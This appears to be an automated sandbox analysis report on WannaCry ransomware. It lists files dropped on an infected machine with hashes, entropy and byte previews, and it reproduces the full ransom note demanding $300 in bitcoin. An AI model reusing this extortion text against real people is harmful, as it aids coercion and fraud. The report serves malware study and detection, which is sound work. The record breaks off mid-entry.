                                                  Preview:WANACRY!.........RB.@.Vr.:u..e.w.....%<b4sk.W..o1...Z|$.1....V;...w?.O...x."y{...[HF..........T.........v.<:...m.4B...t...)4.!..w<......7.t..p0d`.i=.p3.....X.a(3e..RNz..\..._.8.;k:HTy.?.+....i|..9*T..+..._@.+.... ../.M.:.......U...t.`...=..).*..ra....[}m...v.............xG.-4....`.E..).o.$.........@..C0...p!.u....L..Fx).E....j.;.x..z./....L....i..+...b&.x~hZ..E%0....M......fqQ..{"...4.L.%^C...>x/.P.....3.Y..?`.eI._..@....S.eJ...R.s..p..).eP7#Ym.m`...fh.....p2^.Z..sg'....lJ|...No.{S*....9...L.....j....N.A..l..a|.....6....Nl....U.#...K>_/.t..3....+.k...s".E3l-._.?g.Z...._..>.....:...'t,.Km.2...7H......V..Q.vn...{.ZJ.`...d<._.......[`.TD...^..).j.;5$.(....6.......g.F.R.-.>.u6...w9.31U.XQ....Os..V....Q.9(= .uX.x|...c..p..%...+w~6...h.......X.Qf.c\-:..H..].EB7G.j.l.I.z...2.q..:s.....3.....{.Ln/w...W%.88...U.....^...|_).$....;...>=W.28.'.........v3.S...I..<........\......!...?...$...s*~e..X..&.....z.d.Em...x$..7..l...<-..&G.......K......@...m.W9.c

                                                  C:\Users\user\Documents\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842508571135768
                                                  Encrypted:false
                                                  SSDEEP:24:bky42JTv31rDwZ4gTqlonWl3HT3xDF/fISm8uyQwvbCKDWGD1N3BZF2tF6B/87qA:bkCv1fQ4gGGwz3b/fIPyQwXvB2n4JW
                                                  MD5:28108D8BA5DD270EB65D9DC6CBF25443
                                                  SHA1:D6C468CB66562457994D11B05398971EE4ADED60
                                                  SHA-256:396342E5AC2ADF598F926817D2E14AD1833EE1CAA3E117543877778E001B5752
                                                  SHA-512:54390B392D8D430554132772CA1C8C0EF54F0820DCBD45B1618E117E9513A618E28399D0C5EAE7BC44D7C563F6E2F63B1D7E8FDAE218FE7D77DCEDDD0DA35944
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........RB.@.Vr.:u..e.w.....%<b4sk.W..o1...Z|$.1....V;...w?.O...x."y{...[HF..........T.........v.<:...m.4B...t...)4.!..w<......7.t..p0d`.i=.p3.....X.a(3e..RNz..\..._.8.;k:HTy.?.+....i|..9*T..+..._@.+.... ../.M.:.......U...t.`...=..).*..ra....[}m...v.............xG.-4....`.E..).o.$.........@..C0...p!.u....L..Fx).E....j.;.x..z./....L....i..+...b&.x~hZ..E%0....M......fqQ..{"...4.L.%^C...>x/.P.....3.Y..?`.eI._..@....S.eJ...R.s..p..).eP7#Ym.m`...fh.....p2^.Z..sg'....lJ|...No.{S*....9...L.....j....N.A..l..a|.....6....Nl....U.#...K>_/.t..3....+.k...s".E3l-._.?g.Z...._..>.....:...'t,.Km.2...7H......V..Q.vn...{.ZJ.`...d<._.......[`.TD...^..).j.;5$.(....6.......g.F.R.-.>.u6...w9.31U.XQ....Os..V....Q.9(= .uX.x|...c..p..%...+w~6...h.......X.Qf.c\-:..H..].EB7G.j.l.I.z...2.q..:s.....3.....{.Ln/w...W%.88...U.....^...|_).$....;...>=W.28.'.........v3.S...I..<........\......!...?...$...s*~e..X..&.....z.d.Em...x$..7..l...<-..&G.......K......@...m.W9.c

                                                  C:\Users\user\Documents\LSBIHQFDVT\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Documents\LSBIHQFDVT\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847470339597998
                                                  Encrypted:false
                                                  SSDEEP:24:IHbWiRAMeypooJ99aSAC5CCuTSYLd+Xhg3312vNhTSxqi:IHbWiR7Dpo69+C5CCGSLhg3AGxqi
                                                  MD5:38BB5FD980EF362A67D9A563E5A71B7A
                                                  SHA1:F41BF4E84333E8EE48F5913463F4213C95218B54
                                                  SHA-256:E98EA4E4E143432D3A1B186B024C5A3DB37F982975E2081507A9D38447262EA8
                                                  SHA-512:3AFA61CA1857903FA4B86106FFBEFFE93633121507F994C4022703D540C45403BE9E2D4168ADF421561DD4B75196F06CC39E035D53B6DD17395588EDB1606B05
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..}....i:..s..N%.@.I:.E.1...o..r^.C..lcX..pA...8..3.GI;Ka.H..D.k...D.n......f.yx.;.=....4..&....-8o.R..T..O..#.D..J. .l!..#...E.(Y.D...s.:.Wd...V......|...,".j..o......0..J[..]'t....a.y..Y...zs.`\P*,H. $/w^..V.a..f.H)kv...8cbs.9@..".b{pNR......%....|..}.T.ir..*[.I.rz.P..$D.rm.....s..8.G..t...m..y........x.vj..CN.1..7.r.+....2..rkAt".Aa.f......G.j7%..~{....U..^.A...>.....G...^........?.Y).k<.......x#.s.e.Gu.ib.'.;.5.aN...?.=.."h...2.PgI..`..z..^.K.v.@...}Ij:$=..R5.<..W:0..LW.z...$a.\PS......b..n..c.CF.:.F.$.....g.oE..^5.../....81.....*.N.!.Y..H.c(..K.....nF.g;.....TC...??..4.....r.<..+]..V....*...C..2-......S.>..x.5...l./.).m.tm...(.M..Y.o..w...%.7.C...V....s..nu..B.k.....=0...tA.*...9.u...0"..l`$`!..o..z........v..&u.\._m..%..>%.[.c..s?`3.....T.K.e........`D#>..R.2.....z....~...ZG.M.b.lk\.`dI...)..g......F."...2...U.2..6.L...^7.9..~...tJ.P.D..}.s..q8..Qp..&....G0.Mf.d@./8...6....-q.qF.FU.p...v%..~GQ.}..P.:.......M..p.=nt..irrB.)`.......)....n..jq...

                                                  C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83605635943125
                                                  Encrypted:false
                                                  SSDEEP:24:bkdRrqwzhINz0exYu9Hq0QblsB2j+DmT3aF3DEcTlxMlUUYvFQ2:bkLqwG0exq5sgj+DmKlAh+Q2
                                                  MD5:E6F66D68F7964A1BDE8D78A8298A36E8
                                                  SHA1:BAF4384EC83DF5909838DB7677F5D95DCF6B7158
                                                  SHA-256:003E39CD4735153EECA690CF7DCE033D830E811403D1A2E70BFD644A98C14281
                                                  SHA-512:02E3DEBCB0F3E5D2BE2B40D54C0EEE326BF6A2A9552E6564024D5054548F2EA52AFFA861BE85BCCEC7AF153834C9AD52EB3C96E523BDC3D4ABD42DA3B57C24DC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......w!.X..NW6...H.....Xf...}.=....;.......%.l........G;.F......r.H..."..,...N..Kyp/.\5...q%m.[ou....8..$...w.j.S.X.h>7KSw5. .-$_.f..U...vX............1!.WL...1......6.3....C...f.T.]E.....1+.W[...xfv.9we^ pX..........m`.....c5...[..V2..........x..\.j.................7.....M..Q....6m..U........&5y.b....t4u..#.U=1.J_..O...zi`Kf...._.....~#9`Q...=`.0...j..5a[.>.0..,.;7..l.ovAt....p.B.9.d....(..a...,....L.;.C.S.U...F.R.m....(}"...@&.Ah....[j.....w..S...4..H..K.}...8..-.){.ho].{..:FJ.l..=..l...+..jZ. .7..p.Csn....$.s.&6.V.s.N....V..fda..\....."..z.u...q.A..D'.d.......".a....Q...Z.o9..JB.WG.^...PN_.Cz.@..p...e...aT..?.}*...i..KX....<G.K...-4......J.....0..+..C....qP_......E.Z;.......VZ..Z..C.=|.............9B..O....|7.e.U........2...I]..K>1.I....z.(P.......}..A...8.5.....K.k..$J3.{.l.;.u..tcr."A].~.H...w..9..o.....l..G.4.n..#.9......O....?:..f.J)....].].G.L{..P...k.............@o..../..LZ......-...e....De...P...IO22..]gY..Mt$.]..pQ.<.

                                                  C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83605635943125
                                                  Encrypted:false
                                                  SSDEEP:24:bkdRrqwzhINz0exYu9Hq0QblsB2j+DmT3aF3DEcTlxMlUUYvFQ2:bkLqwG0exq5sgj+DmKlAh+Q2
                                                  MD5:E6F66D68F7964A1BDE8D78A8298A36E8
                                                  SHA1:BAF4384EC83DF5909838DB7677F5D95DCF6B7158
                                                  SHA-256:003E39CD4735153EECA690CF7DCE033D830E811403D1A2E70BFD644A98C14281
                                                  SHA-512:02E3DEBCB0F3E5D2BE2B40D54C0EEE326BF6A2A9552E6564024D5054548F2EA52AFFA861BE85BCCEC7AF153834C9AD52EB3C96E523BDC3D4ABD42DA3B57C24DC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......w!.X..NW6...H.....Xf...}.=....;.......%.l........G;.F......r.H..."..,...N..Kyp/.\5...q%m.[ou....8..$...w.j.S.X.h>7KSw5. .-$_.f..U...vX............1!.WL...1......6.3....C...f.T.]E.....1+.W[...xfv.9we^ pX..........m`.....c5...[..V2..........x..\.j.................7.....M..Q....6m..U........&5y.b....t4u..#.U=1.J_..O...zi`Kf...._.....~#9`Q...=`.0...j..5a[.>.0..,.;7..l.ovAt....p.B.9.d....(..a...,....L.;.C.S.U...F.R.m....(}"...@&.Ah....[j.....w..S...4..H..K.}...8..-.){.ho].{..:FJ.l..=..l...+..jZ. .7..p.Csn....$.s.&6.V.s.N....V..fda..\....."..z.u...q.A..D'.d.......".a....Q...Z.o9..JB.WG.^...PN_.Cz.@..p...e...aT..?.}*...i..KX....<G.K...-4......J.....0..+..C....qP_......E.Z;.......VZ..Z..C.=|.............9B..O....|7.e.U........2...I]..K>1.I....z.(P.......}..A...8.5.....K.k..$J3.{.l.;.u..tcr."A].~.H...w..9..o.....l..G.4.n..#.9......O....?:..f.J)....].].G.L{..P...k.............@o..../..LZ......-...e....De...P...IO22..]gY..Mt$.]..pQ.<.

                                                  C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824497585972653
                                                  Encrypted:false
                                                  SSDEEP:24:wNW6UhztvV18Z7r20GM2zDStrz3+X95gX2oAhYDv97iTH:SW6UhhE7rhD2keXbgtA+Dv9ej
                                                  MD5:B0507E493A900C25C0C1F53008553840
                                                  SHA1:66BB53B0D1B4CAE13B4358BDD627193EDECA9858
                                                  SHA-256:79A47E41890CCF62983FB1E84DE25C6B5AD42A8942082FD6418B988F42680F3E
                                                  SHA-512:E607B204545D55C8395FE950F452A3538C88FD1E412362FCB5B3BB041CFB953FA30967007D12240159146D694E100158605FA47B0E3E45E52676E0FB2C33F58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:G...{_..)...-./'.w.n.=..&.&\..ii.G,M.x....M....d.-..S.V..I.sa.[.......y....o...X.V".2.NP...R...OO..i..z.".k./..H..........Q0./T.gbq.u#..y.c......N..a..5QZ'...q....wN.z.aY....]$JH.\FY.]....]..vX.#...__....Ze$..@.&..-\.)..........~eC+..v.K.@.b*...N.$.........;....s..^..._...u...+S..6.=...'.........9..<@..J\_.4.y..j4r's....N.6fbE.x...X..x.\....Q.......V.c#Y.W..P.G..+;^d%.4..F...s...3...T..g..5..u_.-.}f6...P..>%..vS2.^..[..'.5uV.E..[.....RGy.0.r...I..J..S}.lS:...f7.6..{..(.N..=.+vi.Rz!...L..QC.=A..4..W.b.C..v^.%:...w...F.b<.'7.....C....5m`X2.........}{?..`$...C.b./.O.C..s.g..=..m...2."]BN......O.q..y.7.\..........d.X...Y...C.. ...<l..y..H{Q..3... .c.gg.......JH...>...?........6.z.,.........0ljo....e.Mh.1..........IM.?mZD...._.Ac.pJ<.".Gy.M.K....`.......?.l..O#...g...4r.D.......s$2!Y.C..... H.#R+.+.....5....X,bq.t..T,J....6.5;z|..8..kO.....nZ...p...p*C...wclW....:..;.....w....gV.Ix2..'<X...RO.,....8........>...2.'.K_.z<.0.U....LHI["..(..:.

                                                  C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.832537735815458
                                                  Encrypted:false
                                                  SSDEEP:24:bk06u2qOMmqVhAac/JNt3tSkpcmaSleRbo/uUddv9qjjUmjm:bk060j8JtSvm8nUjM7m
                                                  MD5:1520CBD73B1F0C9940D11969152D2565
                                                  SHA1:E634B5E7F6407F8481A239B3218AAAD0995B029C
                                                  SHA-256:9E611FEE0749A188DD155D8D83BB829C6C447784E99F2768998D30D804D1A024
                                                  SHA-512:FA5BD8AD6067027F723D141C2A20A02B3FD35ECA80CE68057E99B620E417DBABEB818FE166D6537662D6ACCD67FE8592C1550B218AFB45F054084EE8B39FBDC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....EcD.|o..E.i..g..p.9.oH.nV.m..?.(.0.'9..s..}p..I%w.rL..L..24............g&5)0}xl` .7.jy!7..vf\;':.o)\.Q.Z.8....k.$....F..9l...$<%...Wz...T..2[...3....`zB.{.TuKHz.%/.+.w.....3.......>l)Q.....g_9.....sk!..v.{......V.."wu...caC.-.o.i.0.a.Q.+....^..#&............C..U@g.*..\....`f.*.Yp......V^V.mC..,..S.&C..-O..CS......6....??..s].........._.b!...%#s..P....A.......C.kR.A.;..]wH~../.....SP.s'#R.%e.[...i.......}..{^.d3sP......u2.[....K.&9..(...x.p......`*P.........eS..;.]..GD].P.wT9.A.M..BJk..8D....q...Uj.NSA.)..iT3...).....oB.E...EJw.!....-S.kS'........b.y..c.... .l...9..#*ST.b...3.......p.........z.D$.K...*.3..=.&.......k.G.........0T...7.s.@.]K76.u.......&.{.dl"......*4.n..x\..h...(jA.tC..!.Dj..W..RV.....8!...u.?.j..W.......q..H0.......b./......b;l......V.`.pu.$~.>........~w........^.....Z.2..O..5Q9#......4..l..8.w.^.K..nB!0..I..^..t.V.5o.WvR..~6.x.RS=...vY.......P..H.........X.Z..d.8..^.......9S........B@/.:..Y........P._U.G.T..'

                                                  C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.832537735815458
                                                  Encrypted:false
                                                  SSDEEP:24:bk06u2qOMmqVhAac/JNt3tSkpcmaSleRbo/uUddv9qjjUmjm:bk060j8JtSvm8nUjM7m
                                                  MD5:1520CBD73B1F0C9940D11969152D2565
                                                  SHA1:E634B5E7F6407F8481A239B3218AAAD0995B029C
                                                  SHA-256:9E611FEE0749A188DD155D8D83BB829C6C447784E99F2768998D30D804D1A024
                                                  SHA-512:FA5BD8AD6067027F723D141C2A20A02B3FD35ECA80CE68057E99B620E417DBABEB818FE166D6537662D6ACCD67FE8592C1550B218AFB45F054084EE8B39FBDC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....EcD.|o..E.i..g..p.9.oH.nV.m..?.(.0.'9..s..}p..I%w.rL..L..24............g&5)0}xl` .7.jy!7..vf\;':.o)\.Q.Z.8....k.$....F..9l...$<%...Wz...T..2[...3....`zB.{.TuKHz.%/.+.w.....3.......>l)Q.....g_9.....sk!..v.{......V.."wu...caC.-.o.i.0.a.Q.+....^..#&............C..U@g.*..\....`f.*.Yp......V^V.mC..,..S.&C..-O..CS......6....??..s].........._.b!...%#s..P....A.......C.kR.A.;..]wH~../.....SP.s'#R.%e.[...i.......}..{^.d3sP......u2.[....K.&9..(...x.p......`*P.........eS..;.]..GD].P.wT9.A.M..BJk..8D....q...Uj.NSA.)..iT3...).....oB.E...EJw.!....-S.kS'........b.y..c.... .l...9..#*ST.b...3.......p.........z.D$.K...*.3..=.&.......k.G.........0T...7.s.@.]K76.u.......&.{.dl"......*4.n..x\..h...(jA.tC..!.Dj..W..RV.....8!...u.?.j..W.......q..H0.......b./......b;l......V.`.pu.$~.>........~w........^.....Z.2..O..5Q9#......4..l..8.w.^.K..nB!0..I..^..t.V.5o.WvR..~6.x.RS=...vY.......P..H.........X.Z..d.8..^.......9S........B@/.:..Y........P._U.G.T..'

                                                  C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.782576802731599
                                                  Encrypted:false
                                                  SSDEEP:24:0xbZy+wiSW7xX5ijM6SLaFjifUBp2+TIIAzZemJvpUYT:0dZdwidxJijMtaJisBp2+NAbJRVT
                                                  MD5:1745903D46EAC6D840523E9D16967F5B
                                                  SHA1:DE9F31E627556E04D95DD5938C5293904825A934
                                                  SHA-256:A7FD505AE9D11AF874ECD1436CF5C50C7E7DE787C5F7D90B72039992DFDF5EDB
                                                  SHA-512:1C5DEED0EE5FA3B6F33C5C7C5F685394DDBF322F4B94398F8DE8385C82A549E27D4CA330566373614C3948876B6E74868B5800D209D639EE50F8F3CE833B8BD4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..Xdl.$..?.|..E....}l..:..A.K.[H... ....(......."PV.i....w..'h..$..G..1.....k'^j.!.m.5E|.y.}.{.\.4...I..F.&}.Ewa.!...Ck.........r.%....`.. .D.Y......;.}<....O$y..C.e..I...U...M....=...G..+......N......`2...||yv..'...e.K ........R...}....Z....UK....&N(Y...U-...q.O........T...C..v.{.5.&......-F[.p.h....bIu...]..(l.62kX~{....j.'.../R...`.].o....dZ.m+.....M.).iLU.*.X......Q..!e1.m.5.Y.PU.r...J.....`..i..G..&?@.....u.U.u......A.......>.].s.2.:z....H...D..3L..Eq.....GT....1.j..:.5.....c[.....l...PjX.rH.......u9p(.+...-r7dpH.-...s.8...5./..:5....4.8.c'...d...Y_0*.. ..._..#.@.(zDD..l..*\.GT1..F!#.k.p...&.;.f.m...M(..]{J.p..5..G..,B..;A..._..G.t..r.g.hi...5z./..<.;.3P.....I(5&A..I...c`TQ..........k...|7..D..!8lw..#pe..H...}.U...$m.s..-B..._.=../..NF..W.`y......@.)&f.]jh...r...|$...2*'Av.q.!i1....sI.M.....Q..5D....,.....G......?......)./!...].:P...x.....g p....On..3.>..#..].2OBq>.`.......?.Xl..M..)..'.......TBG-uQ..w..zQ.!......Ql..g. =.I.#.....

                                                  C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842467662200263
                                                  Encrypted:false
                                                  SSDEEP:24:bkgC3CQMsRErlKJU7/ul+qAjCqybKAo8HErJ8/5E5izYyZJPuDdEoOSubXSr:bkgC+AErlsUuLAj80Rri5E5icyZRAdE+
                                                  MD5:E572E09DE64EFC193AC7C31ADE379ADE
                                                  SHA1:AB7BDA4C42FD7A44A4F025C9F3E834066D88598A
                                                  SHA-256:3BA6F70A72BAB5CF1A532BEF3F41D569D8E722C93932ACD2F4CAA50CDA748064
                                                  SHA-512:A32D4FDCFA93F4441D46AE378AD7937562459409FB55D6AFA578D107838534EF0EF2E627C5CB001A242141E23CCC889BF76AFC4DD5FDF0D465543C3B18022781
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......23...#.kG..J....P.&.._.s."...6\..<,...Z...8...UM.............a..O.......w..a....vx.....F\.o8.%.#..y*....I..M0..W..Y..0(.!j..JY.Y.Gc.4.W.F...w[....3P.._.Q%.....U........J-.r...g.`...D.}{......*:....[.z*..~.T.;gd...=...r.,n...X..!-..S...5..............Q....._..?"..>".....t1w..........)..D.2..Se.5.e..m......N...[..RC.<.e..D...9...j.dxi+.E*6.-......f.~.zd1..t``...Ff.+1oH...W.,HG.!.??1..3.U.tJ+....EGF.....!......C........^\..T.5...O.\E.p...r'...j.f..[#J..........N(tf..Dy3..g..........M....6A]6...v.C^.8h..I.'4Y@..Cf.63.I.....8.Ni...../..d!....O...m....PkG.....'..G. ..e..UG.S.z..8.Se.....F9.>.].O..O....N....S9.K...1/.O..b....&@w.i.....~..........m*}...cK..>.Z.z..j..........ZV.!.....v.D.....q...V.;......^.:-Z2.......R~X....,...{.v.xO.14b.,...c.h.#..S0..-.....7..........<.P.J..V.Lv..0C...C.p.w.-..v...........}...<....R@.w..j.).6- ;t4...(._Z.|km....+6...S.Y...w....LN..........e ..m..a.)..>.....o.....P..'.x....~.p....'.T.F

                                                  C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842467662200263
                                                  Encrypted:false
                                                  SSDEEP:24:bkgC3CQMsRErlKJU7/ul+qAjCqybKAo8HErJ8/5E5izYyZJPuDdEoOSubXSr:bkgC+AErlsUuLAj80Rri5E5icyZRAdE+
                                                  MD5:E572E09DE64EFC193AC7C31ADE379ADE
                                                  SHA1:AB7BDA4C42FD7A44A4F025C9F3E834066D88598A
                                                  SHA-256:3BA6F70A72BAB5CF1A532BEF3F41D569D8E722C93932ACD2F4CAA50CDA748064
                                                  SHA-512:A32D4FDCFA93F4441D46AE378AD7937562459409FB55D6AFA578D107838534EF0EF2E627C5CB001A242141E23CCC889BF76AFC4DD5FDF0D465543C3B18022781
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......23...#.kG..J....P.&.._.s."...6\..<,...Z...8...UM.............a..O.......w..a....vx.....F\.o8.%.#..y*....I..M0..W..Y..0(.!j..JY.Y.Gc.4.W.F...w[....3P.._.Q%.....U........J-.r...g.`...D.}{......*:....[.z*..~.T.;gd...=...r.,n...X..!-..S...5..............Q....._..?"..>".....t1w..........)..D.2..Se.5.e..m......N...[..RC.<.e..D...9...j.dxi+.E*6.-......f.~.zd1..t``...Ff.+1oH...W.,HG.!.??1..3.U.tJ+....EGF.....!......C........^\..T.5...O.\E.p...r'...j.f..[#J..........N(tf..Dy3..g..........M....6A]6...v.C^.8h..I.'4Y@..Cf.63.I.....8.Ni...../..d!....O...m....PkG.....'..G. ..e..UG.S.z..8.Se.....F9.>.].O..O....N....S9.K...1/.O..b....&@w.i.....~..........m*}...cK..>.Z.z..j..........ZV.!.....v.D.....q...V.;......^.:-Z2.......R~X....,...{.v.xO.14b.,...c.h.#..S0..-.....7..........<.P.J..V.Lv..0C...C.p.w.-..v...........}...<....R@.w..j.).6- ;t4...(._Z.|km....+6...S.Y...w....LN..........e ..m..a.)..>.....o.....P..'.x....~.p....'.T.F

                                                  C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.801972753416064
                                                  Encrypted:false
                                                  SSDEEP:24:CkGYSOZfdKYd5M40tmXWd47okFHtr+Mq9sptQkyxV/iNtDOj:CkpfdTdF+nd4zN6MP49xV/iHQ
                                                  MD5:A9DA251708953A180E9E4DDE39145D4A
                                                  SHA1:9E6FE1EFF1451F933870192A8EDAC1C454EF78F7
                                                  SHA-256:B297197BB6754BA8693403EF87D6B5435651C4F777E3DF90914D439A77899AB8
                                                  SHA-512:602C9D316CFCFBBCABD144EDF708EB9E4A40E70A46A5200EA58D4FC8D7B23C00481125841A35EEEE6A0ED98C4B4D62471D36494D6F650EC37587CC7D8EDEC643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:c..7cw.qy.j.....*/.kE.p...+D>.+lX..Z...A!....l.B....&.\.<..(.g.\._..Z.....+.......3..D.`..cZY.7....%.9.5@v..&|.N..T8.._.......h......S..q?z7Y..$A......A....nV|S.Q.&.l.Y.%s#U.5.O.r.2>....7.jm`1..$.....E....cP.Q..a....~...0.G.X~.o...S[oN..|.._n.........C8.Z..U.P......;........IZ..r.........H..#I....H.......$.Q....e.....`.GB..I.o....")E^...#..e(...+;...@)..sn.zk...vW.<.,..#T.....'oq<....Z.%...M....L.S....P[.K...G.;m..w.. ."\K......^4..p.....j.X.V1IRC$.w*..`..p...@.!..5B...6tH.......`Y!.I.0@3.C.'q..9.A.+,...Z.....UjV.c..q.|[.W..!.M.?.d6z.'+....*|.~..rZ.w.x..W.G.......j5{....:.q.........z.aK.$....y...@.^'...........r!.3A.}...{s..my<j..f...*d.*^.n..8....ko......7..{..9..d.w.....w+Di........g.<..?..S>.YM.w..)x9...<....a.L..... .+.........I..!;A..]... .no.W.K.>..A...b..W.7p.J...;.J.........E.~>t(c..$.c..L-.WL..=..M..&1.j.1..-.....h..Z.G2.0?]..l...~.".G.>.^8.K@E^(.w.Lg-.e.0.+g...Db...7.z..A..ad....e...jw.>..'.tT=........E_..`.>A.<B....W..\_eh....

                                                  C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838727452890481
                                                  Encrypted:false
                                                  SSDEEP:24:bk50dq7XLCL6s+CjpZn2Ax0uD13Ja925r41Kgzr98Bi3XsPyaL:bk504naSCj32AxvDy9qrkB8E3G
                                                  MD5:09055AC23F4EDB272CE925E24B19DC61
                                                  SHA1:BCA17A61BEB9E43294A86A8508D08FA4D62856EB
                                                  SHA-256:A7AC40BD8A9B50AB4986C040B6131D01A9179F534BD7EE9B4E245FC7F646E0FC
